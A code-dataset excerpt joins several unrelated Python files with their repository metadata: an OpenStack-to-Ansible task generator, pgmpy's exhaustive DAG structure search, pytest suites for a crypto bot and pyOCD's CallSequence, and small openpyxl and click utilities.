                           force_optimize=conf.VARS_OPT_SECGROUPS):
    """Build `os_security_group` tasks plus one `os_security_group_rule`
    task per rule.

    Group tasks are always emitted directly; rule tasks may be collapsed
    into one optimized variable block per group, named
    ``<group_name>_rules`` (dashes replaced by underscores).

    :param data: dump dict containing a ``secgroups`` list.
    :param force_optimize: collapse the rule tasks per group.
    :returns: list of Ansible task dicts.
    """
    tasks = []
    group_names = {g['id']: g['name'] for g in data['secgroups']}
    plain_rule_keys = ('description', 'ethertype', 'direction',
                       'port_range_max', 'port_range_min', 'protocol')
    for group in data['secgroups']:
        entry = {'state': 'present'}
        location = group.get('location') or {}
        if location.get('cloud'):
            entry['cloud'] = location['cloud']
        entry['name'] = group['name']
        if value(group, 'security_group', 'description'):
            entry['description'] = group['description']
        tasks.append({'os_security_group': entry})
        if not group.get('security_group_rules'):
            continue
        staged_rules = []
        for rule in group['security_group_rules']:
            task = {'security_group': group['name']}
            if entry.get('cloud'):
                task['cloud'] = entry['cloud']
            for key in plain_rule_keys:
                if value(rule, 'security_group_rule', key):
                    task[key] = rule[key]
            if value(rule, 'security_group_rule', 'remote_group_id'):
                # Remote groups are referenced by name in the playbook.
                task['remote_group'] = group_names[rule['remote_group_id']]
            if value(rule, 'security_group_rule', 'remote_ip_prefix'):
                task['remote_ip_prefix'] = rule['remote_ip_prefix']
            if force_optimize:
                staged_rules.append({'os_security_group_rule': task})
            else:
                tasks.append({'os_security_group_rule': task})
        if force_optimize:
            optimized = optimize(
                staged_rules,
                var_name=group['name'].replace('-', '_') + "_rules")
            if optimized:
                tasks.append(optimized)
    return tasks
def create_routers(self, data, strict_ip=False,
                   force_optimize=conf.VARS_OPT_ROUTERS):
    """Build one `os_router` Ansible task per router in the dump.

    Router interfaces are reconstructed from the ports owned by the
    router; the external gateway is resolved to its network name and,
    where applicable, to explicit external fixed IPs.

    :param data: dump dict with ``routers``, ``ports``, ``subnets`` and
        ``networks`` lists.
    :param strict_ip: when True, also pin the external fixed IP/subnet
        for routers with exactly one external fixed IP (routers with
        several external fixed IPs are always pinned, as before).
    :param force_optimize: collapse the tasks into an optimized variable
        block named ``routers``.
    :returns: list of Ansible task dicts (optionally optimized).
    :raises Exception: when a port or gateway references an unknown
        subnet or network id.
    """
    def resolve_external_ip(ext):
        # Map the subnet id to its name when known; otherwise fall back
        # to the raw id (the subnet may be outside the dumped project).
        ext_subnet = subnet_ids.get(ext['subnet_id'])
        subnet_name = ext_subnet['name'] if ext_subnet else ext['subnet_id']
        return {'subnet': subnet_name, 'ip': ext['ip_address']}

    routers = []
    pre_optimized = []
    subnet_ids = {i['id']: i for i in data['subnets']}
    net_ids = {i['id']: i for i in data['networks']}
    for rout in data['routers']:
        r = {'state': 'present'}
        if rout.get('location') and rout['location'].get('cloud'):
            r['cloud'] = rout['location']['cloud']
        r['name'] = rout['name']
        if value(rout, 'router', 'is_admin_state_up'):
            r['admin_state_up'] = rout['is_admin_state_up']
        r['interfaces'] = []
        # Interfaces come from the ports whose device is this router.
        ports = [i for i in data['ports'] if i['device_id'] == rout['id']]
        for p in ports:
            for fip in p['fixed_ips']:
                subnet = subnet_ids.get(fip['subnet_id'])
                if not subnet:
                    raise Exception("No subnet with ID=%s" %
                                    fip['subnet_id'])
                if subnet['gateway_ip'] == fip['ip_address']:
                    # Port sits on the subnet gateway IP: a plain
                    # subnet-name interface is enough.
                    r['interfaces'].append(subnet['name'])
                else:
                    net = net_ids.get(p['network_id'])
                    if not net:
                        raise Exception("No network with ID=%s" %
                                        p['network_id'])
                    r['interfaces'].append({
                        'net': net['name'],
                        'subnet': subnet['name'],
                        'portip': fip['ip_address'],
                    })
        if not r['interfaces']:
            del r['interfaces']
        if rout['external_gateway_info']:
            ext_net = net_ids.get(
                rout['external_gateway_info']['network_id'])
            if not ext_net:
                raise Exception("No net with ID=%s" % rout[
                    'external_gateway_info']['network_id'])
            r['network'] = ext_net['name']
            ext_ips = rout['external_gateway_info']['external_fixed_ips']
            if len(ext_ips) == 1 and strict_ip:
                r['external_fixed_ips'] = [resolve_external_ip(ext_ips[0])]
            elif len(ext_ips) > 1:
                # Bug fix: the list was previously reassigned on every
                # iteration, so only the LAST external fixed IP
                # survived; collect all of them instead.
                r['external_fixed_ips'] = [resolve_external_ip(ext)
                                           for ext in ext_ips]
        if force_optimize:
            pre_optimized.append({'os_router': r})
        else:
            routers.append({'os_router': r})
    if force_optimize:
        optimized = optimize(
            pre_optimized,
            var_name="routers")
        if optimized:
            routers.append(optimized)
    return routers
def create_servers(self, data, force_optimize=conf.VARS_OPT_SERVERS):
    """Build one `os_server` Ansible task per server in the dump.

    How the boot source is expressed (existing boot volume, source
    image, or a newly created boot volume) and how NICs / floating IPs
    are rendered depends on the global `conf` switches.
    """
    def get_boot_volume(volumes):
        # Let's assume it's only one bootable volume
        for v in volumes:
            vol = volumes_dict[v['id']]
            if not vol['is_bootable']:
                continue
            return vol

    def has_floating(addresses):
        # True if any address on any network has the 'floating' type.
        return 'floating' in [
            j['OS-EXT-IPS:type'] for i in list(addresses.values()) for j in i]

    servers = []
    pre_optimized = []
    if conf.DUMP_STORAGE:
        volumes_dict = {i['id']: i for i in data['volumes']}
        images_dict = {i['id']: i['name'] for i in data['images']}
    else:
        # Storage was not dumped: boot-source lookups below stay empty.
        volumes_dict = {}
        images_dict = {}
    flavors_names = {i['id']: i['name'] for i in data['flavors']}
    for ser in data['servers']:
        s = {'state': 'present'}
        s['name'] = ser['name']
        if ser.get('location') and ser['location'].get('cloud'):
            s['cloud'] = ser['location']['cloud']
        if value(ser, 'server', 'security_groups'):
            # De-duplicate security group names.
            s['security_groups'] = list(set(
                [i['name'] for i in ser['security_groups']]))
        s['flavor'] = flavors_names[ser['flavor']['id']]
        if value(ser, 'server', 'key_name'):
            s['key_name'] = ser['key_name']
        if value(ser, 'server', 'scheduler_hints'):
            s['scheduler_hints'] = ser['scheduler_hints']
        if value(ser, 'server', 'metadata'):
            s['meta'] = ser['metadata']
        if value(ser, 'server', 'config_drive'):
            # Nova reports config_drive as the string 'True'.
            s['config_drive'] = ser['config_drive'] == 'True'
        if value(ser, 'server', 'user_data'):
            s['userdata'] = ser['user_data']
        # Images and volumes
        if ser['image']['id']:
            if ser['image']['id'] in images_dict:
                s['image'] = (
                    ser['image']['id']
                    if not conf.IMAGES_AS_NAMES
                    else images_dict[ser['image']['id']])
            else:
                # Unknown image: report and skip this server entirely.
                print("Image with ID=%s of server %s is not in images list" %
                      (ser['image']['id'], ser['name']))
                continue
        else:
            # Dancing with boot volumes
            if conf.USE_EXISTING_BOOT_VOLUMES:
                s['boot_volume'] = get_boot_volume(
                    ser['attached_volumes'])['id']
                # s['volumes'] = [i['id'] for i in ser['attached_volumes']]
            elif conf.USE_SERVER_IMAGES:
                # Recover the original image from the boot volume's
                # image metadata.
                meta = get_boot_volume(ser['attached_volumes'])[
                    'volume_image_metadata']
                s['image'] = (meta['image_name']
                              if conf.IMAGES_AS_NAMES else meta['image_id'])
            # NOTE(review): assumed to apply regardless of the branch
            # above (original nesting ambiguous) — confirm vs upstream.
            if conf.CREATE_NEW_BOOT_VOLUMES:
                s['boot_from_volume'] = True
                s['volume_size'] = get_boot_volume(
                    ser['attached_volumes'])['size']
        if ser.get('attached_volumes'):
            non_bootable_volumes = [i['id'] for i in ser['attached_volumes']
                                    if not volumes_dict[i['id']]['is_bootable']]
            if non_bootable_volumes:
                s['volumes'] = non_bootable_volumes
        if ser.get('addresses'):
            if conf.NETWORK_AUTO:
                # In case of DHCP just connect to networks
                nics = [{"net-name": i}
                        for i in list(ser['addresses'].keys())]
                s['nics'] = nics
            elif conf.STRICT_NETWORK_IPS:
                # Pin each fixed IP to its network explicitly.
                s['nics'] = []
                for net in list(ser['addresses'].keys()):
                    for ip in ser['addresses'][net]:
                        if ip['OS-EXT-IPS:type'] == 'fixed':
                            s['nics'].append(
                                {'net-name': net, 'fixed_ip': ip['addr']})
            if conf.FIP_AUTO:
                # If there are existing floating IPs only
                s['auto_ip'] = has_floating(ser['addresses'])
            elif conf.STRICT_FIPS:
                fips = [j['addr'] for i in list(ser['addresses'].values())
                        for j in i if j['OS-EXT-IPS:type'] == 'floating']
                s['floating_ips'] = fips
        if force_optimize:
            pre_optimized.append({'os_server': s})
        else:
            servers.append({'os_server': s})
    if force_optimize:
        optimized = optimize(
            pre_optimized,
            var_name="servers")
        if optimized:
            servers.append(optimized)
    return servers
def create_keypairs(self, data, force_optimize=conf.VARS_OPT_KEYPAIRS):
    """Build one `os_keypair` Ansible task per keypair in the dump.

    :param data: dump dict containing a ``keypairs`` list.
    :param force_optimize: collapse the tasks into an optimized variable
        block named ``keypairs``.
    :returns: list of Ansible task dicts (optionally optimized).
    """
    tasks = []
    staged = []
    for key in data['keypairs']:
        entry = {'state': 'present'}
        entry['name'] = key['name']
        location = key.get('location') or {}
        if location.get('cloud'):
            entry['cloud'] = location['cloud']
        if value(key, 'keypair', 'public_key'):
            entry['public_key'] = key['public_key']
        destination = staged if force_optimize else tasks
        destination.append({'os_keypair': entry})
    if force_optimize:
        optimized = optimize(
            staged,
            var_name="keypairs")
        if optimized:
            tasks.append(optimized)
    return tasks
def create_images(self, data, set_id=False,
                  force_optimize=conf.VARS_OPT_IMAGES):
    """Build one `os_image` Ansible task per image in the dump.

    :param data: dump dict containing an ``images`` list.
    :param set_id: also record the original image id in the task.
    :param force_optimize: collapse the tasks into an optimized variable
        block named ``images``.
    :returns: list of Ansible task dicts (optionally optimized).
    """
    tasks = []
    staged = []
    # (dump attribute, ansible parameter) pairs copied before the
    # visibility flag...
    leading_fields = (
        ('checksum', 'checksum'),
        ('container_format', 'container_format'),
        ('disk_format', 'disk_format'),
        ('owner_id', 'owner'),
        ('min_disk', 'min_disk'),
        ('min_ram', 'min_ram'),
    )
    # ...and after it. `protected` is only supported by ansible > 2.8,
    # so it is deliberately not exported.
    trailing_fields = (
        ('file', 'filename'),
        ('ramdisk_id', 'ramdisk'),
        ('kernel_id', 'kernel'),
        ('volume', 'volume'),
        ('properties', 'properties'),
    )
    for img in data['images']:
        entry = {'state': 'present'}
        entry['name'] = img['name']
        if set_id:
            entry['id'] = img['id']
        location = img.get('location') or {}
        if location.get('cloud'):
            entry['cloud'] = location['cloud']
        for src, dst in leading_fields:
            if value(img, 'image', src):
                entry[dst] = img[src]
        if value(img, 'image', 'visibility'):
            entry['is_public'] = (img['visibility'] == 'public')
        for src, dst in trailing_fields:
            if value(img, 'image', src):
                entry[dst] = img[src]
        if force_optimize:
            staged.append({'os_image': entry})
        else:
            tasks.append({'os_image': entry})
    if force_optimize:
        optimized = optimize(
            staged,
            var_name="images")
        if optimized:
            tasks.append(optimized)
    return tasks
def create_volumes(self, data, force_optimize=conf.VARS_OPT_VOLUMES):
    """Build one `os_volume` Ansible task per volume in the dump.

    Unnamed volumes are skipped when ``conf.SKIP_UNNAMED_VOLUMES`` is
    set; otherwise their id is used as the display name.

    :param data: dump dict containing a ``volumes`` list.
    :param force_optimize: collapse the tasks into an optimized variable
        block named ``volumes``.
    :returns: list of Ansible task dicts (optionally optimized).
    """
    vols = []
    pre_optimized = []
    for vol in data['volumes']:
        v = {'state': 'present'}
        if not vol['name'] and conf.SKIP_UNNAMED_VOLUMES:
            continue
        # Bug fix: the id fallback for unnamed volumes was previously
        # set and then unconditionally overwritten by the empty name;
        # now the fallback actually sticks.
        v['display_name'] = vol['name'] if vol['name'] else vol['id']
        if vol.get('location') and vol['location'].get('cloud'):
            v['cloud'] = vol['location']['cloud']
        if value(vol, 'volume', 'display_description'):
            v['display_description'] = vol['description']
        if value(vol, 'volume', 'size'):
            v['size'] = vol['size']
        if ('volume_image_metadata' in vol and 'image_name'
                in vol['volume_image_metadata']):
            # Volume was created from an image: reference it by name.
            v['image'] = vol['volume_image_metadata']['image_name']
        if value(vol, 'volume', 'metadata'):
            v['metadata'] = vol['metadata']
        if value(vol, 'volume', 'scheduler_hints'):
            v['scheduler_hints'] = vol['scheduler_hints']
        if value(vol, 'volume', 'snapshot_id'):
            v['snapshot_id'] = vol['snapshot_id']
        if value(vol, 'volume', 'source_volume_id'):
            v['volume'] = vol['source_volume_id']
        if force_optimize:
            pre_optimized.append({'os_volume': v})
        else:
            vols.append({'os_volume': v})
    if force_optimize:
        optimized = optimize(
            pre_optimized,
            var_name="volumes")
        if optimized:
            vols.append(optimized)
    return vols
def main():
    """Entry point: build and run the playbook for the test cloud."""
    OpenstackAnsible("test-cloud").run()


if __name__ == "__main__":
    main()
| 44.078571 | 84 | 0.500826 |
058c059f761eda96c89499a971e05f607a042f58 | 8,572 | py | Python | pgmpy/estimators/ExhaustiveSearch.py | SkySlime/pgmpy | f379c8c3ca58651f4309b20289a09e7636fc0157 | [
"MIT"
] | null | null | null | pgmpy/estimators/ExhaustiveSearch.py | SkySlime/pgmpy | f379c8c3ca58651f4309b20289a09e7636fc0157 | [
"MIT"
] | null | null | null | pgmpy/estimators/ExhaustiveSearch.py | SkySlime/pgmpy | f379c8c3ca58651f4309b20289a09e7636fc0157 | [
"MIT"
] | 1 | 2021-11-05T03:27:56.000Z | 2021-11-05T03:27:56.000Z | #!/usr/bin/env python
from warnings import warn
from itertools import combinations
import networkx as nx
from pgmpy.estimators import StructureEstimator, ScoreCache
from pgmpy.estimators import K2Score
from pgmpy.utils.mathext import powerset
from pgmpy.base import DAG
class ExhaustiveSearch(StructureEstimator):
    """Exhaustive structure search over every DAG on the data's variables.

    Each candidate DAG is scored with the supplied ``StructureScore``
    (``K2Score`` by default) and the maximum-scoring one wins. Since
    ``2**(n*(n-1))`` graphs are enumerated for ``n`` variables, this is
    only feasible for a handful of variables (roughly n <= 6).
    """

    def __init__(self, data, scoring_method=None, use_cache=True, **kwargs):
        """Initialize the searcher.

        Parameters
        ----------
        data: pandas.DataFrame
            One column per variable; missing cells set to ``numpy.NaN``.
        scoring_method: StructureScore instance, optional
            An instance of ``K2Score``, ``BDeuScore`` or ``BicScore``;
            a ``K2Score`` over *data* is used when omitted.
        use_cache: bool
            Wrap the score in a ``ScoreCache`` for faster repeated
            evaluation. Only valid for decomposable scores; can give
            wrong results with custom scoring methods.
        **kwargs
            Forwarded to the score and to ``StructureEstimator``
            (e.g. ``state_names``, ``complete_samples_only``).
        """
        if scoring_method is None:
            # Default: cached K2 score over the supplied data.
            self.scoring_method = ScoreCache.ScoreCache(K2Score(data, **kwargs), data)
        elif use_cache:
            self.scoring_method = ScoreCache.ScoreCache(scoring_method, data)
        else:
            self.scoring_method = scoring_method
        super(ExhaustiveSearch, self).__init__(data, **kwargs)

    def all_dags(self, nodes=None):
        """Yield every DAG over *nodes*, sparse graphs first.

        Parameters
        ----------
        nodes: list, optional
            Node names for the generated DAGs; taken from the data's
            state names when omitted.

        Yields
        ------
        nx.DiGraph
            Each acyclic digraph, ordered by edge count (empty first).
        """
        if nodes is None:
            nodes = sorted(self.state_names.keys())
        if len(nodes) > 6:
            warn("Generating all DAGs of n nodes likely not feasible for n>6!")
            warn(
                "Attempting to search through {0} graphs".format(
                    2 ** (len(nodes) * (len(nodes) - 1))
                )
            )

        # All n*(n-1) possible directed edges: each unordered pair in
        # both directions.
        directed_edges = list(combinations(nodes, 2))
        directed_edges += [(b, a) for a, b in directed_edges]

        # powerset() enumerates 2^(n*(n-1)) edge subsets, smallest
        # first, which gives the "sparse ones first" ordering.
        for edge_subset in powerset(directed_edges):
            candidate = nx.DiGraph()
            candidate.add_nodes_from(nodes)
            candidate.add_edges_from(edge_subset)
            if nx.is_directed_acyclic_graph(candidate):
                yield candidate

    def all_scores(self):
        """Score every possible DAG and return them sorted by score.

        Returns
        -------
        list
            ``(score, dag)`` tuples in ascending score order, where
            ``score`` is a float and ``dag`` an acyclic ``nx.DiGraph``.
        """
        scored = [(self.scoring_method.score(dag), dag)
                  for dag in self.all_dags()]
        scored.sort(key=lambda pair: pair[0])
        return scored

    def estimate(self):
        """Exhaustively search for the best-scoring network structure.

        Only the structure is estimated, not the parametrization.

        Returns
        -------
        pgmpy.base.DAG
            The maximal-scoring DAG.
        """
        winner = max(self.all_dags(), key=self.scoring_method.score)
        best_model = DAG()
        best_model.add_nodes_from(sorted(winner.nodes()))
        best_model.add_edges_from(sorted(winner.edges()))
        return best_model
| 42.86 | 103 | 0.558213 |
64300882d550f521f9d8325c9a17ca3378315613 | 782 | py | Python | test_my_crypto.py | nkaviani/demo-crypto-bot | 59d61cdec675a038d7c0c46f71893a145df59b97 | [
"Apache-2.0"
] | 2 | 2017-12-20T17:13:09.000Z | 2018-01-11T12:38:11.000Z | test_my_crypto.py | nimakaviani/demo-crypto-bot | 59d61cdec675a038d7c0c46f71893a145df59b97 | [
"Apache-2.0"
] | null | null | null | test_my_crypto.py | nimakaviani/demo-crypto-bot | 59d61cdec675a038d7c0c46f71893a145df59b97 | [
"Apache-2.0"
] | null | null | null | import pytest
import os
# integration tests
@pytest.fixture
def my_crypto_no_watson(capsys, monkeypatch):
    """Return a MyCrypto whose Notifier calls are replaced by assertions."""
    from helpers.notifier import Notifier
    from my_crypto import MyCrypto

    def fake_balance(self, recipient_id, wallet, time):
        assert recipient_id == "sender-id"

    def fake_quick_reply(self, recipient_id, msg):
        assert recipient_id == "sender-id"
        assert ('balance' in msg or 'account' in msg)

    monkeypatch.setattr(Notifier, "quick_reply", fake_quick_reply)
    monkeypatch.setattr(Notifier, "balance", fake_balance)
    return MyCrypto()
@pytest.mark.usefixtures("my_crypto_no_watson")
def test_handle(my_crypto_no_watson):
    """A 'balance' message from sender-id is handled without error."""
    message = {"sender": "sender-id", "message": "balance"}
    my_crypto_no_watson.handle(message)
| 30.076923 | 69 | 0.735294 |
caa433a70652038e6cadb2dae271e10758c7e155 | 1,179 | py | Python | fix_xlsx.py | hasadna/israel_tree_removal_permit_scraper | 808817463cdfefc17ce1d16bb95632414a1d4d4a | [
"MIT"
] | 1 | 2021-02-08T14:27:25.000Z | 2021-02-08T14:27:25.000Z | fix_xlsx.py | hasadna/israel_tree_removal_permit_scraper | 808817463cdfefc17ce1d16bb95632414a1d4d4a | [
"MIT"
] | null | null | null | fix_xlsx.py | hasadna/israel_tree_removal_permit_scraper | 808817463cdfefc17ce1d16bb95632414a1d4d4a | [
"MIT"
] | null | null | null | import logging
from io import BytesIO
from pathlib import Path
from openpyxl import load_workbook
logger = logging.getLogger(__name__)
def fix_excel_file(p):
    """Strip fully-empty rows from the workbook at path *p*.

    Returns ``(False, p)`` when nothing needed fixing, otherwise
    ``(True, BytesIO)`` holding the cleaned workbook bytes.
    """
    workbook = load_workbook(p)
    sheet = workbook.active
    empty_rows = [idx for idx, row in enumerate(sheet.rows, 1)
                  if not any(cell.value for cell in row)]
    if not empty_rows:
        return False, p
    logger.warning(
        f"Fixing {p.name}: deleting empty rows #{','.join(str(x) for x in empty_rows)}"
    )
    # Delete bottom-up so earlier indices stay valid.
    for idx in reversed(empty_rows):
        sheet.delete_rows(idx, 1)
    buffer = BytesIO()
    workbook.save(buffer)
    buffer.seek(0)
    return True, buffer
def fix_xlsx_files(folder: Path):
    """Repair every ``.xlsx`` file directly inside *folder* in place."""
    for path in folder.glob("*.xlsx"):
        logger.info(f"Checking {path.name}...")
        was_fixed, stream = fix_excel_file(path)
        if was_fixed:
            logger.warning(f"Overwriting {path.name}")
            path.write_bytes(stream.read())
if __name__ == "__main__":
    # Script mode: verbose logging, then fix everything under ./downloads.
    logging.basicConfig(
        format="[%(levelname)s %(asctime)s %(module)s:%(lineno)d] %(message)s",
        level=logging.INFO,
    )
    fix_xlsx_files(Path(__file__).parent / "downloads")
| 24.061224 | 82 | 0.597116 |
df13087384d076ca81957412378ba83cb3f7c8d2 | 8,993 | py | Python | test/unit/test_sequencer.py | claymation/pyOCD | 7f1db3b64c16e54a791421cdf4946418f13848ff | [
"Apache-2.0"
] | 276 | 2020-09-30T16:43:24.000Z | 2022-03-27T09:52:01.000Z | test/unit/test_sequencer.py | claymation/pyOCD | 7f1db3b64c16e54a791421cdf4946418f13848ff | [
"Apache-2.0"
] | 282 | 2020-10-02T17:45:29.000Z | 2022-03-31T10:37:30.000Z | test/unit/test_sequencer.py | claymation/pyOCD | 7f1db3b64c16e54a791421cdf4946418f13848ff | [
"Apache-2.0"
] | 106 | 2020-10-01T10:06:44.000Z | 2022-03-29T10:06:06.000Z | # pyOCD debugger
# Copyright (c) 2018-2019 Arm Limited
# Copyright (c) 2021 Chris Reed
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import six
from pyocd.utility.sequencer import CallSequence
class TestCallSequence:
    """Unit tests for pyocd.utility.sequencer.CallSequence.

    Each test appends markers to a local `results` list from task
    callables, then asserts on execution order. Fixed: removed a
    leftover debug print() from test_iter.
    """

    def test_empty(self):
        """A fresh sequence has no tasks."""
        cs = CallSequence()
        assert cs.count == 0

    def test_a(self):
        """Tasks run in insertion order."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs.invoke()
        assert results == ['a ran', 'b ran']

    def test_append_1(self):
        """Appending a single task runs it after existing ones."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            )
        assert cs.count == 1
        cs.append(
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs.invoke()
        assert results == ['a ran', 'b ran']

    def test_append_2(self):
        """Appending multiple tasks preserves their order."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            )
        assert cs.count == 1
        cs.append(
            ('b', lambda : results.append('b ran')),
            ('c', lambda : results.append('c ran')),
            )
        assert cs.count == 2
        cs.invoke()
        assert results == ['a ran', 'b ran', 'c ran']

    def test_remove_1(self):
        """A removed task no longer runs."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs.remove_task('b')
        assert cs.count == 1
        cs.invoke()
        assert results == ['a ran']

    def test_callable(self):
        """Calling the sequence object is equivalent to invoke()."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs()
        assert results == ['a ran', 'b ran']

    def test_nested(self):
        """A sequence can itself be a task of another sequence."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2

        cs2 = CallSequence(
            ('c', cs),
            )
        assert cs2.count == 1
        cs2.invoke()
        assert results == ['a ran', 'b ran']

    def test_clear(self):
        """clear() drops all tasks."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs.clear()
        assert cs.count == 0

    def test_iter(self):
        """Iterating yields (name, callable) pairs in order."""
        results = []
        def task_a():
            results.append('a ran')
        def task_b():
            results.append('b ran')
        cs = CallSequence(
            ('a', task_a),
            ('b', task_b),
            )
        assert cs.count == 2

        it = iter(cs)
        assert six.next(it) == ('a', task_a)
        assert six.next(it) == ('b', task_b)
        with pytest.raises(StopIteration):
            six.next(it)

    def test_get(self):
        """get_task() returns the callable; unknown names raise KeyError."""
        results = []
        def task_a():
            results.append('a ran')
        cs = CallSequence(
            ('a', task_a),
            )
        assert cs.count == 1
        assert cs.get_task('a') == task_a
        with pytest.raises(KeyError):
            cs.get_task('foo')

    def test_has(self):
        """has_task() reports task presence by name."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            )
        assert cs.count == 1
        assert cs.has_task('a')
        assert not cs.has_task('foo')

    def test_replace(self):
        """replace_task() swaps the callable for an existing name."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs.replace_task('b', lambda : results.append('wheee'))
        cs()
        assert results == ['a ran', 'wheee']

    def test_wrap(self):
        """wrap_task() passes the task's return value to the wrapper."""
        results = []
        def task_b():
            results.append('b ran')
            return "task b result"
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', task_b),
            )
        assert cs.count == 2

        def wrapper(t):
            assert t == "task b result"
            results.append('wrapper ran')

        cs.wrap_task('b', wrapper)
        cs()
        assert results == ['a ran', 'b ran', 'wrapper ran']

    def test_returned_seq(self):
        """A task returning a sequence has that sequence run inline."""
        results = []
        def task_b():
            results.append('b ran')

            cs2 = CallSequence(
                ('x', lambda : results.append('x ran')),
                ('y', lambda : results.append('y ran')),
                )
            assert cs2.count == 2
            return cs2
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', task_b),
            ('c', lambda : results.append('c ran')),
            )
        assert cs.count == 3
        cs()
        assert results == ['a ran', 'b ran', 'x ran', 'y ran', 'c ran']

    def test_insert_before_1(self):
        """insert_before() a middle task."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs.insert_before('b', ('c', lambda : results.append('c ran')))
        assert cs.count == 3
        cs()
        assert results == ['a ran', 'c ran', 'b ran']

    def test_insert_before_2(self):
        """insert_before() the first task."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs.insert_before('a', ('c', lambda : results.append('c ran')))
        assert cs.count == 3
        cs()
        assert results == ['c ran', 'a ran', 'b ran']

    def test_insert_before_3(self):
        """insert_before() with multiple new tasks keeps their order."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs.insert_before('a', ('c', lambda : results.append('c ran')),
                              ('d', lambda : results.append('d ran')))
        assert cs.count == 4
        cs()
        assert results == ['c ran', 'd ran', 'a ran', 'b ran']

    def test_insert_before_4(self):
        """insert_before() an unknown task name raises KeyError."""
        results = []
        cs = CallSequence()
        with pytest.raises(KeyError):
            cs.insert_before('z', ('c', lambda : results.append('c ran')))

    def test_insert_after_1(self):
        """insert_after() the last task."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs.insert_after('b', ('c', lambda : results.append('c ran')))
        assert cs.count == 3
        cs()
        assert results == ['a ran', 'b ran', 'c ran']

    def test_insert_after_2(self):
        """insert_after() a middle task."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs.insert_after('a', ('c', lambda : results.append('c ran')))
        assert cs.count == 3
        cs()
        assert results == ['a ran', 'c ran', 'b ran']

    def test_insert_after_3(self):
        """insert_after() with multiple new tasks keeps their order."""
        results = []
        cs = CallSequence(
            ('a', lambda : results.append('a ran')),
            ('b', lambda : results.append('b ran')),
            )
        assert cs.count == 2
        cs.insert_after('a', ('c', lambda : results.append('c ran')),
                             ('d', lambda : results.append('d ran')))
        assert cs.count == 4
        cs()
        assert results == ['a ran', 'c ran', 'd ran', 'b ran']

    def test_insert_after_4(self):
        """insert_after() an unknown task name raises KeyError."""
        results = []
        cs = CallSequence()
        with pytest.raises(KeyError):
            cs.insert_after('z', ('c', lambda : results.append('c ran')))
| 31.010345 | 74 | 0.469476 |
38099fba8fe0d65ec2eec45fe43d6dea1dbf6b92 | 423 | py | Python | misc_scripts/file_to_bytes.py | jtara1/misc_scripts | 83ba473fefbc05ce8e0743e7e618e871dfe94be1 | [
"Apache-2.0"
] | 4 | 2018-11-05T10:47:02.000Z | 2022-02-05T08:17:56.000Z | misc_scripts/file_to_bytes.py | jtara1/MiscScripts | 83ba473fefbc05ce8e0743e7e618e871dfe94be1 | [
"Apache-2.0"
] | 4 | 2017-12-30T20:46:10.000Z | 2018-02-04T00:03:25.000Z | misc_scripts/file_to_bytes.py | jtara1/MiscScripts | 83ba473fefbc05ce8e0743e7e618e871dfe94be1 | [
"Apache-2.0"
] | null | null | null | import click
@click.command()
@click.argument('file_name', type=click.Path())
@click.argument('output_file_name', default='file_bytes.txt', type=click.Path())
def file_to_bytes(file_name, output_file_name):
    # Dump the repr() of the input file's raw bytes into the output
    # file. (Kept as a comment, not a docstring, so click's --help text
    # stays unchanged.)
    with open(file_name, 'rb') as source, open(output_file_name, 'w') as target:
        target.write(str(bytes(source.read())))


if __name__ == "__main__":
    file_to_bytes()
| 26.4375 | 80 | 0.690307 |
61c1d48647e9167255a265fd044fa3243a1c8970 | 761 | py | Python | deep-rl/lib/python2.7/site-packages/OpenGL/raw/WGL/NV/render_texture_rectangle.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 210 | 2016-04-09T14:26:00.000Z | 2022-03-25T18:36:19.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/raw/WGL/NV/render_texture_rectangle.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 72 | 2016-09-04T09:30:19.000Z | 2022-03-27T17:06:53.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/raw/WGL/NV/render_texture_rectangle.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
